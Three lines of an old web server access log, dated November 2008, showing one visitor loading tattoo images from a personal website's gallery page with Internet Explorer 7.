82.203.3.7 - - [03/Nov/2008:04:43:07 -0600] "GET /tattoo/tatc10.JPG HTTP/1.0" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:07 -0600] "GET /tattoo/tatc2.JPG HTTP/1.0" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
82.203.3.7 - - [03/Nov/2008:04:43:07 -0600] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2)"
